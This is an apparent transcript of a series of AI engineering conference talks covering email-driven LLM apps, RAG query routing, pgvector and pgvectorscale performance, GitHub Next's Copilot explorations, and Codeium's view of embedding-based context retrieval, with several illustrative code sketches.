And this will help tell Gmail and other clients that they should include all these emails into a single thread. Eventually, you're going to have to figure out how you want to deal with conversations. The best way to do this is to use the mailbox hash. You know by now that you can add a plus after the first part of an email address.
You just want to generate some sort of unique identifier. And then when your app brings in the inbound message, you check to see if that's there. If the mailbox hash is not present, then it's a new conversation. If it is, then you can look it up, retrieve the messages and add them appropriately.
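Putting those pieces together, here is a minimal sketch of the receive-and-reply loop using FastAPI and Postmark's inbound webhook. Field names follow Postmark's docs as I recall them, the addresses and token are placeholders, and FastAPI's BackgroundTasks stands in for the Celery worker mentioned above:

```python
# Inbound email -> background generation -> threaded reply, in rough outline.
import uuid
import requests
from fastapi import BackgroundTasks, FastAPI, Request

app = FastAPI()
POSTMARK_TOKEN = "your-server-token"              # placeholder: load from env in practice
BOT_ADDRESS = "story@adventuresinemail.example"   # hypothetical sending address
conversations: dict[str, list[str]] = {}          # mailbox hash -> prior messages

def generate_reply(history: list[str], latest: str) -> str:
    # Placeholder for the LLM call; history lets the model see the whole thread.
    return f"(LLM reply to {latest!r}, with {len(history)} earlier messages)"

def process_and_reply(inbound: dict) -> None:
    hash_ = inbound.get("MailboxHash") or uuid.uuid4().hex  # empty hash = new conversation
    history = conversations.setdefault(hash_, [])
    reply_text = generate_reply(history, inbound["TextBody"])
    history.append(inbound["TextBody"])

    requests.post(
        "https://api.postmarkapp.com/email",
        headers={"X-Postmark-Server-Token": POSTMARK_TOKEN},
        json={
            "From": BOT_ADDRESS.replace("@", f"+{hash_}@"),  # plus-address carries the hash
            "To": inbound["From"],
            "Subject": inbound["Subject"],                   # same subject keeps the thread
            "TextBody": reply_text,
            # May need angle brackets around the ID depending on the client.
            "Headers": [{"Name": "References", "Value": inbound["MessageID"]}],
        },
        timeout=30,
    )

@app.post("/inbound")
async def inbound_webhook(request: Request, background: BackgroundTasks):
    payload = await request.json()         # Postmark delivers the email as JSON
    background.add_task(process_and_reply, payload)
    return {"status": "queued"}            # reply later; email is async anyway
```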
Also, one of the quickest ways to get these apps out into the world is to use OpenAI's Assistants API. And you can use the thread ID that they give you as the mailbox hash. And then they give you a nice GUI that you can use to edit the system prompt and iterate quickly.
And I've actually gotten to a place where I could deploy prototypes using the Assistants API really quickly. I don't think it's the best for production apps at scale. But if you just want to get something out and start getting feedback from your users quickly, it's a really, really great way to go.
Again, my name is Greg Baugues with Haihai Labs. You can find me online at GreggieB. If you want to learn more about this stuff, you can check out my blog, haihai.ai. I've documented a lot of these learnings in more detail there. And if you've got any questions, just send me an email.
Hello. I'm Max, the CEO of CIT AI. And today I'm going to tell you why queries are all you need. RAG learnings from processing 3 billion tokens a day. One of the great things that you can do when you have actual volume across your pipelines is you can look at what types of queries and requests actually come through your system.
And what we quite quickly realized is that 68% of production queries are destined to fail with naive RAG, because only 32% are answerable just with semantic search. 22% are meta queries, like give me the last 10 documents on this topic. Or they're off-topic queries where the answer is not in the data store.
Or they require more complex operations like comparisons: compare X and Y and give me an answer. Or they're just junk and other noise, which clogs up the system. So why is naive RAG so ineffective? It's because the querier, whether that's an AI or a human, is unaware of the retrieval capabilities and the data that is indexed.
They just ask for what they want, unaware of whether they can actually get an answer. And the lazy solution here is to give the querier context about the information that is stored and the ways that it can be retrieved. This is actually hard in practice because the information keeps changing.
So you need to update that context, that instruction or that prompt, continuously. And it's also a lazy solution. After all, you don't have to read a manual to search the Internet. A better solution lets the querier ask for anything and tries to answer it in a best-effort way.
This means that it takes a query, which is a natural language question, but also a wish list of what that perfect answer would look like. What is the metadata? What does it fulfill? Even if the fields and properties being asked for here don't actually exist in a single record in the data store.
This is completely independent. The querier can just ask for what they want. If it's a human, they can ask for whatever they want. But if it's an LLM, it can hallucinate arbitrary parameters to make this work. And if the system cannot answer the question, it refuses it politely.
So let's have a look at how such a solution actually works. On the left side, we have the query and the wish list coming in. We have an embedder, an agentic router that generates a set of semantic queries, multiple semantic queries if necessary, and meta queries that use things like date-range sorting, sort by newest, sort by oldest, and other properties.
And once those results come back from the data store, we pump them through a final check: hey, does this actually help answer the question? And if it doesn't, then we refuse. And if it does, we give that answer back.
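A heavily simplified sketch of that routing flow; the classifier, data-store calls, and relevance check below are stand-ins, not the production pipeline:

```python
# Route a query to semantic / meta / comparison handling, then verify or refuse.
from dataclasses import dataclass, field

@dataclass
class Answer:
    refused: bool
    text: str = ""
    sources: list = field(default_factory=list)

def classify(query: str) -> str:
    # In the real system an LLM router decides; keyword rules keep the sketch runnable.
    q = query.lower()
    if "compare" in q:
        return "comparison"
    if q.startswith(("last", "latest", "give me the last")):
        return "meta"
    return "semantic"

def semantic_search(query: str, top_k: int = 5) -> list:
    return []   # stand-in for an embedding search against the data store

def meta_search(query: str) -> list:
    return []   # stand-in for sort-by-newest / date-range style lookups

def is_relevant(query: str, docs: list) -> bool:
    return bool(docs)   # stand-in for the final "does this answer it?" LLM check

def answer(query: str, wish_list: dict) -> Answer:
    kind = classify(query)
    if kind == "comparison":
        # Fan out: one query for an existing comparison, one per item being compared.
        items = wish_list.get("items", [])
        docs = semantic_search(query) + [d for it in items for d in semantic_search(it)]
    elif kind == "meta":
        docs = meta_search(query)
    else:
        docs = semantic_search(query)
    if not is_relevant(query, docs):
        return Answer(refused=True, text="Sorry, I can't answer that from the indexed data.")
    return Answer(refused=False, text="(synthesized answer)", sources=docs)

print(answer("compare plan A and plan B", {"items": ["plan A", "plan B"]}))
```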
Now let's go back to our original example of those 10,000 sample queries across our systems from last month. We see above the line that 32% are answerable with just a semantic search. And then we have those other categories. And here we see that the 32% semantic are retained. And we now also cover those 10% which are comparison questions, by being able to route through multiple different semantic queries.
So for example, for us to compare between two different things, we would most likely route three different queries: one asking for a comparison of X and Y, in case there's an existing comparison in the data store, and then two different queries to retrieve context about the two items being compared.
And in theory, this scales to any N items being compared. We also cover the meta questions, or we find a way to get closer to covering all of those meta questions. And we refuse in the cases where we cannot actually provide a good answer. The downside of this is latency and cost.
You can imagine that pulling everything through such a system is (a) expensive and (b) introduces quite a bit of lag. But you can actually solve for both of these through a lot of different techniques that we've developed internally and that we hope to share in the near future, such as speculative retrieval, embedding-based query routing, compressed embeddings, and a reduced query language to handle these meta queries better.
As well as lightweight schema-aware LLMs that know how to interact with the data store. If you're looking for a job and you love working on hard engineering problems at scale, please email me. And we're releasing our query and embedding pipeline for everyone in July 2024. We're really excited to see you try it.
Postgres is the most popular database in the world, according to the 2023 Stack Overflow Developer Survey. And despite the myriad of specialized vector databases out there, Postgres is a top choice for many developers building AI applications. And that's thanks to PG vector. PG vector is an open source Postgres extension for vector data.
It provides the ability to store and search vectors in Postgres and transforms a 30-year-old relational database into a fully fledged vector database. And thanks to PG vector, Postgres has become one of the most widely adopted vector databases for RAG applications. And that's thanks to its ease of use, SQL support, and operational simplicity.
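To make the "ease of use, SQL support" point concrete, here is a minimal sketch of using pgvector from Python; the table, column names, and toy three-dimensional vectors are made up for illustration:

```python
# Store and search embeddings with pgvector from any Postgres driver (psycopg2 here).
import psycopg2

conn = psycopg2.connect("dbname=app user=app")  # assumption: adjust to your setup
cur = conn.cursor()

cur.execute("CREATE EXTENSION IF NOT EXISTS vector;")
cur.execute("""
    CREATE TABLE IF NOT EXISTS documents (
        id bigserial PRIMARY KEY,
        contents text,
        embedding vector(3)   -- 3 dims to keep the sketch readable; use 768/1536 etc.
    );
""")
cur.execute(
    "INSERT INTO documents (contents, embedding) VALUES (%s, %s::vector), (%s, %s::vector);",
    ("about cats", "[0.9, 0.1, 0.0]", "about databases", "[0.1, 0.8, 0.3]"),
)

# <=> is pgvector's cosine distance operator; <-> is L2, <#> is negative inner product.
cur.execute(
    """
    SELECT id, contents
    FROM documents
    ORDER BY embedding <=> %s::vector
    LIMIT 1;
    """,
    ("[0.0, 0.9, 0.2]",),
)
print(cur.fetchone())   # expect the "about databases" row
conn.commit()
```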
But the one question hanging over Postgres versus using specialized vector databases has been performance. And the reasoning goes like this. Dedicated vector databases have purpose-built data structures and algorithms for storing and searching large volumes of vector data, thus offering better performance and scalability compared to general purpose databases with added vector support.
Well, I'm here to tell you that the good news is that the answer to the question about whether Postgres can scale for vectors is yes. Enter PG vector scale. PG vector scale is an open source Postgres extension that builds on PG vector, enabling greater performance and scalability. My name is Avthar.
I'm a product leader for AI at Timescale. We're a Postgres cloud database company. And I'm going to tell you about PG vector scale, the open source extension that we built to scale vector workloads on Postgres. We built PG vector scale for three reasons. First, to make Postgres a better database for AI.
Second, to challenge the notion that Postgres and PG vector are not performant or scalable for vector workloads. Thirdly, to give developers a way to keep using PG vector, but without any performance or scalability bottlenecks. PG vector scale is licensed under the open source Postgres license, and it complements PG vector rather than competing with it by leveraging the PG vector data type and distance functions, further enriching the Postgres ecosystem for building AI applications.
And by using PG vector and PG vector scale together, developers can build more scalable AI applications, benefiting from higher performance embedding search and cost efficient storage. Before I delve into the details of the technical innovations behind PG vector scale, let's answer the biggest question. How does it perform? To answer this question, my team compared the performance of Postgres with PG vector and PG vector scale installed against Pinecone, widely regarded as a market leader for specialized vector databases.
We used a benchmark of 50 million embeddings of 768 dimensions each. And here are the results. We found that with PG vector scale, Postgres gets 28x lower p95 latency than Pinecone's storage-optimized index and 1.4 times lower p95 latency against Pinecone's performance-optimized index on the same dataset. And thanks to the power of open source, developers can get these results at 75% less monthly cost when self-hosting.
Now that you've seen the numbers behind the performance, let's dig into how pgvectorscale gets to these results. pgvectorscale brings specialized data structures and algorithms for large-scale vector search and storage to Postgres as an extension, helping deliver comparable and often superior performance to specialized vector databases. It does this with two key innovations. The first is a new high-performance, cost-efficient search index called StreamingDiskANN. Inspired by research on billion-scale vector search at Microsoft and improved on by Timescale's own researchers, StreamingDiskANN overcomes limitations of in-memory indexes like HNSW, or hierarchical navigable small worlds.
It does this by storing part of the index on disk rather than entirely in memory, making it more cost efficient to run and scale as vector workloads grow. That ability to store the index on disk vastly decreases the cost of storing and searching large amounts of vectors, since SSDs are much cheaper than RAM.
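As a rough sketch of what that looks like in practice, continuing the hypothetical table from the earlier example: enabling the extension and building a StreamingDiskANN index is a couple of SQL statements. The syntax below follows the pgvectorscale README at the time of writing; check the project's GitHub page for current details.

```python
# Continuing the psycopg2 session from the earlier pgvector example.
cur.execute("CREATE EXTENSION IF NOT EXISTS vectorscale CASCADE;")  # also pulls in pgvector

# Build a StreamingDiskANN index on the embedding column; queries that
# ORDER BY embedding <=> ... can then use the index instead of a full scan.
cur.execute("""
    CREATE INDEX IF NOT EXISTS documents_embedding_idx
    ON documents USING diskann (embedding vector_cosine_ops);
""")
conn.commit()
```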
The second innovation is a new high-accuracy quantization method called statistical binary quantization, or SBQ for short. Developed by researchers at Timescale, this technique improves on standard binary quantization by improving accuracy when quantization is used to reduce the storage space needed for vectors. More details about pgvectorscale, its performance, and how the technical innovations work can be found on the pgvectorscale GitHub page.
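SBQ itself isn't spelled out here, but the standard binary quantization it builds on is easy to sketch: keep only the sign of each dimension and compare codes by Hamming distance. The snippet below is a generic illustration of that baseline, not Timescale's SBQ.

```python
import numpy as np

def binary_quantize(vectors: np.ndarray) -> np.ndarray:
    """Standard binary quantization: keep the sign bit of each dimension and
    pack 8 bits per byte. A 768-dim float32 vector (3072 bytes) becomes 96 bytes."""
    return np.packbits(vectors > 0, axis=-1)

def hamming(a: np.ndarray, b: np.ndarray) -> int:
    """Number of differing bits between two packed codes (XOR + popcount)."""
    return int(np.unpackbits(np.bitwise_xor(a, b)).sum())

rng = np.random.default_rng(0)
docs = rng.standard_normal((1000, 768)).astype(np.float32)
query = rng.standard_normal(768).astype(np.float32)

codes = binary_quantize(docs)
qcode = binary_quantize(query)
dists = [hamming(c, qcode) for c in codes]
print("closest doc ids:", np.argsort(dists)[:5])
```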
But the key takeaway is that Postgres is scalable for vector workloads, and thanks to pgvectorscale, we can all be the guy on the right and just use Postgres for AI applications. Thank you. Hey everyone. I'm Aditya Advani, an AI engineer based in San Francisco. Along with my teammates, I created Math Matrix Movies at a hackathon in SF on May 11th, 2024.
Today, I'd like to show you what our project can do, because I think it's really cool. What it does is generate math explainer videos in a truly unique style that is able to get concepts across visually. This is something that I think is really unique and that you may never have seen before. So AI hackers, let's start with a live demo. In our demo, I decided that perhaps we should talk about probability. This year, only 10% of the applicants to speak at this AI Engineer World's Fair were accepted to speak on stage. I didn't make the cut, which is why you're watching me on this recording.
Now there's no hard feelings, but I'm ambitious. And so I want to try again for next year.
Thank you. All right. Great. Hey, everyone. So excited to be welcoming you to the CodeGen track here at the AI Engineer World's Fair. My name is Brittany Walker. I am a GP at Charles River Ventures, a.k.a.
CRV. We are an early-stage venture capital firm investing primarily at seed and Series A rounds, and we've been around for 54 years, believe it or not. There, my focus is primarily on infrastructure, and I've done a bunch of AI infrastructure investments in the past couple of years, which is how I've gotten to know swyx, our gracious host, relatively well. And I'm very excited about the topic of CodeGen, as I'm sure all of you are here today. To walk through this topic, we're going to have some amazing speakers. We're going to have Rahul Pandita joining us from GitHub. We're going to have Kevin Hou joining us from Codeium, and then we're going to have Michael Truell joining us from Cursor. We're going to lead things off with Rahul. He works at GitHub Next, specifically, and works on the Copilot Workspace product in that context. I'm sure all of you are familiar with GitHub Copilot, probably the number one AI product that has taken the world by storm in the past year, year and a half here, and incredible statistics around its adoption, downloads, all of that.
He can tell you more, but I'm excited to have him walking us through some of his efforts today. Thank you. Hello, everyone. How are you today? Pretty good. Pretty good. I guess this is the afternoon session, so I'm standing between you and your lunch, so I'll try to get through this as quickly as possible.
Hi. My name is Rahul Pandita, and I am a researcher at GitHub Next. And today, we're going to talk about some of the GitHub Next explorations. Now, before we begin, who among you have heard of GitHub Next? Oh, cool. Quite a few of you. That will make it go much easier and much faster.
All right. For those of you who don't know us, we are a bunch of about 20 researchers, senior-ish developers, and mostly tool builders who work outside of the regular product teams and report directly to our CEO. And that's by design. Our goal is to explore the future of software engineering, like you all are doing in your day-to-day jobs. And the reason for exploring is that, once we do our explorations, we pass on our learnings to the product and development teams so that they can build really compelling products like Copilot, which you all have used, hopefully, at some point.
As an aside, for people who are following us on Twitter, I don't look anything like my picture over here. I'm the one in the green background. But we do have Devon in our team. He's not an automated AI. He's a very real person, and he looks exactly like the person on the top right corner on that slide.
All right. Since we have gotten that out of the way, let's get to the future of software engineering with regards to Gen AI. So here's what Andrew Ng, who single-handedly trained a whole generation of machine learning engineers, has to say about AI: that it's the new electricity. It's going to transform software development and almost every other field, just like electricity did 100 years ago. So what does that mean? Here's a picture of what a manufacturing facility looked like before electrification. There used to be a giant, mostly coal-powered steam turbine or steam engine located centrally, which would turn these giant shafts, which would turn these auxiliary shafts, so forth and so on, and individual workers would connect to these shafts using a belt and pulley system, right?
And these engines were, like, really, really huge. So the workers and the whole architecture of the factory were designed around this steam engine. And the whole workflow was around the steam engine. And it was the workers who were working around the technology rather than the technology working for people, right? And along came electric motors in the 1880s, and they had the potential to revolutionize the manufacturing sector. Why? Because unlike steam engines, they retained their efficiency when they were smaller, right? So you could basically redesign the entire factory floor plan. So you would think that, wow, this is great, and everyone would jump on this. But it was not until the 1920s that these became mainstream. So early 1880s to late 1920s. What was happening for about those 40 years? What was happening was exploration and experimentation. People were trying to figure out how to use this technology, how to make it better, how to de-risk it to a point that the use of this technology becomes the norm rather than the exception.
And that's what we do at GitHub Next, right? Our charter is to explore the future of software engineering. And with the emphasis on the word explore, right? Because if we knew what the future of software engineering in context of AI looks like, we would just build it. That's more efficient.
But unfortunately, we do not. So what we have to resort to is exploration. We just try out different things, rapidly prototype, experiment, and figure out whether something works or not. And if it works, then we put it out in front of our customers and users, and we learn from them, and then we finally transform into a product.
Oftentimes, an idea begins as a functional prototype, which goes through heavy dogfooding inside the next team. If it survives that, then we move on to the next level of dogfooding that is inside the company. If it survives that, then we move on to the next level, which is releasing it as a tech preview to other early adopters.
We learn from that. If it survives that, then it may have a chance to become a product in the future. And we can kill or shelve any of these explorations at any point of time, if we are not getting the right signal, so that we can explore other areas. We did that with Copilot. So yes, Copilot started off as a Next experiment. And since then, we have created many other experiments like Copilot for CLI, Copilot Voice, GitHub Blocks, SpecLang, so forth and so on. A lot of these have transformed into products of their own, so you can see some of them as GitHub product offerings. A lot of them have been absorbed into existing products, and you will see them as part of those existing products. And a significant number of them have been shelved. We learned what we learned from those experiments and figured out that this was not the right time for that kind of exploration, or the exploration itself was flawed.
But we learned from them, and we will keep that learning and use it in our next explorations. So that was an overview of GitHub Next, and today I'm going to talk about two specific explorations that are currently active from a GitHub Next perspective: Copilot next edit suggestions and Copilot Workspace. And specifically, I'm going to talk about what their motivations were, how they came to be, and what the future plans are for them. So, first off, Copilot next edit suggestions. It started off with this question: what if ghost text could be more intelligent? So we all know what Copilot does: it provides you code completions in your current context, right? It's really, really good at creating new code, but that's not all we do, right? We almost always edit existing code, which involves editing, adding, and deleting lines at multiple locations in a program. What if ghost text was good at that as well? That's what this exploration is. We call it next edit suggestions, and it provides suggestions not only at the current cursor location, but also about what else needs to change in the program. But enough talking, let's jump on to a demo.
All right. Here, I am going to add this parameter in this Python program. And next edit suggestions automatically picks it up and says, hey, you need to update your method definition. Once we update the method definition, it says, hey, you need to add these arguments. And once that has been updated, it will go back and say, hey, now the code documentation is not in line with what the code is actually doing. And it goes ahead and updates that as well. And the same thing repeats when I add one more parameter.
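To make the demo concrete, here is the kind of multi-location change being described, with invented names (not the actual demo code): adding one parameter ripples into the signature, the docstring, and the call site, and each follow-on edit is what the tool would propose next.

```python
# Hypothetical illustration only.
# Before: the function, its docstring, and its call site all agree.
def send_invoice(customer_id: str) -> None:
    """Send an invoice to the given customer."""
    ...

send_invoice("cust_42")

# After the developer types one new parameter, the follow-on edits the tool
# would suggest at the other locations look like this:
def send_invoice(customer_id: str, currency: str = "USD") -> None:
    """Send an invoice to the given customer in the requested currency."""
    ...

send_invoice("cust_42", currency="EUR")
```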
So that was the Copilot next edit suggestions experiment. We are not ready yet. We are still experimenting with a bunch of other stuff, like, you know, is ghost text completion the right modality for it, or do we need to figure out a different way of presenting those suggestions? What if the location of the next edit is not visible in the current viewport? Or what if the location is in a file that is not even open in the editor? Most importantly, we are also working on fine-tuning the models specifically for this use case, the idea being that if we want next edit suggestions to be accurate and very useful, then the suggestions need to be on point.
And once we are done with these further sub-explorations and we feel that it has gotten through our internal dog fooding standard, next edit suggestions would be coming out either as a standalone tech preview from Next or as a part of an existing Next product sometime in your IDE in the next few months.
All right. So that was code completions, but let's move from code completions to task completions. Why move to task completions? It just turns out that while code is an important artifact that comes out of software development, it's not the only artifact.
Software development involves this inner loop where you begin with a task, the idea is like what am I supposed to do? What is the specific thing that I'm trying to do? And followed by how do I go about doing that thing? What are the frameworks that are at my disposal?
What are the programming languages that are at my disposal? What is the existing code that's there? How do I write a new code that is consistent with those codes? So that becomes a sort of a specification. And once you understand where you are, then you sort of try to decide, like, where am I going with it?
Like, how does the final product look like? Once you have zeroed in on that, then you go about what specific file changes do I need to make to get to that final product? And that sort of becomes a plan. And once you get to the plan, then you go to the implementation part.
And that forms this loop of software development. We call it the inner loop. And we would like AI to be helpful in all those aspects of that inner loop. And that's why we built Copilot Workspace. And mind you, like all Next explorations, it did not start as Copilot Workspace. It started as individual explorations. For instance, we started to figure out, can we use natural language as a functional specification of programs? That's the SpecLang exploration. In parallel, we were trying to figure out if we could improve code completions by prompting the model with runtime information. And all of those things, combined with user feedback, came together into this one bigger exploration called Copilot Workspace. And we were also talking to our users. We wanted to talk to developers and ask, hey, we are building this thing. How would you like AI to support you?
What are your major pain points? And a few things became very, very clear while talking to our users. The first thing is that the biggest difficulty people faced was getting started on a task. Like, I know that an issue is assigned to me. How do I get started on it? Followed by, how do I trust the output of the AI? I don't trust it. And more importantly, they told us that problem solving is what software development is about, and they would like to retain the problem-solving aspects of it. And they would like the help of AI in the form of a thought partner, or a sparring partner, or a second brain, which they can collaborate with to solve a problem.
And lastly, and most importantly, they would like to retain control. Developers are in control, not the other way around. And with this feedback, we built Copilot Workspace. So what is it? It simplifies getting started, with a one-click proposal for your tasks. It has a built-in runtime that allows you to quickly verify the code that has been provided by the AI. It has an environment which is built for iteration, so if you feel that the AI is going in the wrong direction, you can just go and quickly correct it. And most importantly, it is designed for collaboration. So you can share your work as part of a GitHub pull request, or you can share your workspace with your colleagues if you're not yet comfortable with it.
But enough talking. Let's just get into a demo, right? So this is Monaspace, which is another GitHub Next exploration. If we are going to write code, let's write code in style. It is a family of monospace fonts that has been released by GitHub. And this is a website that outlines a bunch of features of these fonts. And over here, somewhere over here, is this playground which shows how the syntax highlighting looks across different languages. Notice that it is missing Rust. And Rust appears to be the next cool thing that all the cool kids are doing. So we would like to update this Monaspace website with a Rust example as well. So how do I get started? I've created this issue, or somebody has created this issue; it just happens to be me for the purpose of this demo. I would like to add a Rust example to the font playground.
And I can just click this button over here, and it will open Copilot Workspace for me. And through the magic of caching, you can see that it quickly generates the current specification and the proposed specification. Why caching? Because I had to finish this demo in time. But trust me, it's not a matter of hours. It does happen in a matter of minutes, right? And for those of you who are interested, I would like to do a live demo for you in the Microsoft booth after this talk. All right. So what is the current specification?
It just goes and figures out, does the website have this playground that contains a Rust example? And it says that it doesn't. And then it goes to the target state: what does the target state look like? And it would say that, yes, the website will have the specific package for syntax highlighting. The website will have this package in package.json. And then I will update a bunch of other files. It looks nice. And I'll go and generate a plan for it. Again, through the magic of caching, a plan has been generated. And it will tell you that these three files need to be updated. It appears that this is at the right level of detail. Then I will go ahead and implement it. And yes, magic of caching again. What we see is the files that are over here. Now, this seems nice. But what about the iteration part?
What you can do is, at any given point of time, if you feel that something is not right, you can just go ahead and say that, okay, add Rust to the language mappings. And say, add code documentation. And you can edit at any given point of time. And what you can also do is that you can edit via chat over here.
And you can say that, hey, I want to edit this one specific location. How do I go about doing this? I'm not going to do this because it's going to go through the whole iteration loop. And then the illusion of the caching will break. And it will take a lot of time.
But I would like to show that in live demos afterwards. But how do I trust whether this is, in fact, the right thing? So I will open up this integrated terminal. And I will say, install and run this repo. All right, so what's going to happen is that a suggestion is going to load, and apparently not the right thing.
But I can quickly go and edit it and say that, all right, this is the command that I'm specifically looking for. And I can go and run. Now, this will run this command in an actual terminal. And we'll see the output in some point of time. And you can see that actually this code does compile.
What we also have is a preview. What we can do is open the live preview. I don't trust it. It will say that it's just going to be a second, but it takes longer than that while that loads. What are the other things? One of the things that you would say is that, hey, you wrote a very simple command in the terminal.
You said npm. You could actually type that thing in the terminal. And yes, you're right. I can type that thing. But think about that in a mobile setting, when you can open Copilot workspace on your phone. It becomes very tedious to type those symbols, right? And if you have used the mobile keyboard, it's not very useful for that.
So that's why we use this natural language way of writing these commands in the terminal, so that it can help you when you're on the go. It can synthesize those commands. And hopefully, the website has loaded. And there is a Rust example, right? Cool. There was a demo. And thank you.
We are not stopping there. We are working on a bunch of improvements, and I can talk about these improvements on a one-on-one basis with you. You already saw some of them, like the runtime support to synthesize terminal commands and faster file completions, which make Copilot Workspace better.
But there are other Next explorations that are also active. Like, how do we rethink developer learning with AI? And how does code review change if the majority of the code being written is now written by AI? What does that mean? Some of these explorations will work out. Some of these explorations you will see as tech previews. And some of these explorations we will kill because we don't know where they're going. So in summary, I'm saying that we do not know what the future of AI is, but what we do know is that exploration is the way to get there. And with all your help, we'll jointly explore the space so that, unlike with electricity, we don't have to wait 40 years to get to a place with software development where we enjoy the benefits of AI. You have been a lovely audience.
That is my time. I really appreciate you. And if you have more questions, or if you want to have live demos, I'm available in the Microsoft booth, like, two salons over that side. Thank you so much. Okay. Thank you so much for that. That was a truly incredible demo and some amazing work you guys are doing over there at GitHub Next.
As Rahul mentioned, for all of our speakers today, we're not going to be taking live questions. So I'm going to ask you guys to go and find them after the fact. As Rahul mentioned, he'll be at the Microsoft booth over in the Expo and then we'll give you locations for the other speakers as they finish up as well.
Next we have Kevin Hou. He is the head of product engineering at Codeium. This is probably one of the most incredible pivot stories in AI of the past year and a half. The company used to be Exafunction and is now one of the best code assistant products out there, actually voted by developers as the highest-satisfaction code assistant product in a recent Stack Overflow survey, and it just hit a million downloads in VS Code last month, which is truly incredible. So I'm going to welcome him to the stage, Kevin Hou, head of product engineering. All right. Cool. Thank you, Rahul. We are going to kick it off with, let's see, make sure that's not my Slack up there. Cool. All right, all set. So my name is Kevin, and I'm going to be talking about how embeddings are stunting AI agents.
So I'm going to let you in on some secrets about how we build the product and exactly what we're doing behind the scenes to improve your code gen experience. At Codeium, we are building AI developer tools, and we're starting with an IDE plugin. As mentioned before, we've been downloaded over a million and a half times. We're one of the top-rated extensions across the different marketplaces. And to reiterate, we offer free unlimited autocomplete, chat, and search across 70 different languages and 40 different IDEs. So we plug into all the popular IDEs. We are the highest-rated developer tool as voted by developers in the most recent Stack Overflow survey. And you'll note that this is even higher than tools like ChatGPT and GitHub Copilot. Importantly, we are trusted by Fortune 500s to deliver high-quality code that actually makes it into production. And we do this with top-grade security, licensing, and attribution for some of the largest enterprises on the planet. Our goal at Codeium is to empower every developer to have superpowers, both inside the IDE and beyond. And today, I'm going to let you in on some secrets about how we've been able to build a tool like this and why users choose us over the other AI tools on the market.
And the short answer is context awareness. So here's a quick overview about what context looks like today. We're all familiar since we're at an AI conference with the basics of retrieval augmented generation, the idea being that a user puts in a query, you accumulate context from a variety of different sources, you throw it into your LLM, and then you get a response, whether that be a code generation or a chat message.
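As a minimal sketch of that retrieve-assemble-generate loop, with placeholder `retrieve` and `call_llm` functions standing in for whatever retriever and model you actually use:

```python
def retrieve(query: str, k: int = 5) -> list[str]:
    """Placeholder: return the k context snippets most relevant to the query
    (e.g. via embedding search over design-system code, local forms, docs)."""
    return ["<snippet 1>", "<snippet 2>"]

def call_llm(prompt: str) -> str:
    """Placeholder for whatever chat/completion API or local model you use."""
    return "<generated code or chat answer>"

def answer(query: str) -> str:
    # Accumulate context, build a prompt, and generate.
    context = "\n\n".join(retrieve(query))
    prompt = (
        "Use the following context from the user's codebase to answer.\n\n"
        f"### Context\n{context}\n\n### Task\n{query}\n"
    )
    return call_llm(prompt)

print(answer("Build a contact form in React that matches our design system."))
```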
Here's a concrete example of how retrieval can be used in code generation. Let's say we want to build a contact form in React. Now, you could go to ChatGPT and ask it to generate a contact form. But in reality, on a moderately large code base, this is really not going to work. It's not going to give you things that are personalized to you. And this is really where context retrieval comes in. We need to build a contact form that, you know, is in line with our design system components. Let's say you already have buttons and inputs. It has to be able to pattern match with local instances of other forms inside of your code base.
It has to ingest your style guide. For example, if you're using Tailwind, you have to be able to detect and make the form look and feel like every other thing on your site. And then of course, there's documentation both locally and externally for packages and other dependencies. So the question becomes, how do you collect and rank these items so that our code generation can be both fast and accurate for your use case?
So to dive into a couple of different methods for how people are tackling this today, there are really three main pillars. The first one is long context. This is the idea that if you expand the prompt window of your LLM, it can read more input and therefore be a bit more personalized to what you're trying to generate, right?
You just shove more items into your prompt. But this comes at the cost of latency and financial cost. So one of the most recent examples was Gemini. Gemini actually takes 36 seconds to ingest 325k tokens. To put this into perspective, a moderately sized or even small repo is easily over 1 million tokens.
And that amounts to about 100k lines of code. And in this instance, most enterprises have over a billion tokens of code. It's simply not feasible to throw everything into a long context model. The second method is fine-tuning. For those that are familiar, fine-tuning is the idea of actually tweaking the weights of your model to reflect the distribution of the data that your consumer expects, right?
And so this requires continuous updates. It's rather expensive computationally. You have to have one model per customer and it's honestly prohibitively expensive for most applications. And finally, we have embeddings. And for all of you, hopefully you're familiar, this is a relatively proven technology today. It's pretty inexpensive to compute and store.
But the difficulty that we're about to dive into is that it is hard to reason over multiple items. It also has a low dimensional space. And I'll talk about that shortly. So to dive deeper into embeddings, the whole concept is that you take your objects, you throw it through an embedding model, and then you end up with some sort of vector, some sort of array of numerical values.
And this is in a fixed dimension. And so by mapping and chunking code, we can map each chunk to an embedding. And that allows us to quickly search over our functions, our documents, whatever you decide to chunk by. And this is what's called embedding search.
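A bare-bones version of that chunk-embed-search pipeline might look like the following; the `embed` function is a hashed bag-of-words stand-in for a real embedding model, and the corpus, file names, and chunking rule are invented for illustration.

```python
import numpy as np

def embed(text: str, dim: int = 128) -> np.ndarray:
    """Stand-in for a real embedding model: hashed bag-of-words, L2-normalized."""
    v = np.zeros(dim)
    for tok in text.lower().split():
        v[hash(tok) % dim] += 1.0
    n = np.linalg.norm(v)
    return v / n if n else v

def chunk(source: str, max_lines: int = 20) -> list[str]:
    """Naive chunker: fixed-size line windows (real systems chunk by function/class)."""
    lines = source.splitlines()
    return ["\n".join(lines[i:i + max_lines]) for i in range(0, len(lines), max_lines)]

# Index: one embedding per chunk of each file.
corpus = {"Button.tsx": "...", "ContactForm.tsx": "...", "tailwind.config.js": "..."}
index = [(path, c, embed(c)) for path, src in corpus.items() for c in chunk(src)]

def search(query: str, k: int = 5):
    """Return the k chunks whose embeddings are most similar to the query."""
    q = embed(query)
    scored = sorted(index, key=lambda item: float(q @ item[2]), reverse=True)
    return [(path, text) for path, text, _ in scored[:k]]

print(search("contact form component using our design system inputs"))
```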
Embedding search, like I said, is not a new concept. There are a bunch of models that have tried to optimize for it. And in this example, we're looking at one of the kind of North Star eval benchmarks; it's become increasingly popular. And the question becomes, how do we fit millions of lines of code into an LLM so that we can actually generate useful results?
And so it's evident through the years that we're actually hitting a ceiling on what is possible using these traditional vector embeddings. And over time, even the biggest models are converging to around the same level of performance. As you can see, everything's kind of within plus or minus five. And at Codeium, we believe that this is because, fundamentally, we cannot distill the dimension space of all possible questions, all possible English queries, down into the embedding dimension space that our vectors are going to occupy. And so at Codeium, we've thought very critically about what retrieval means to us. Are we measuring the right things? And does semantic distance between these vectors really equate to things like function relevance in the concrete example that I showed earlier? And what we landed on is that benchmarks, like the one I showed you before, heavily skew towards this idea of needle in a haystack.
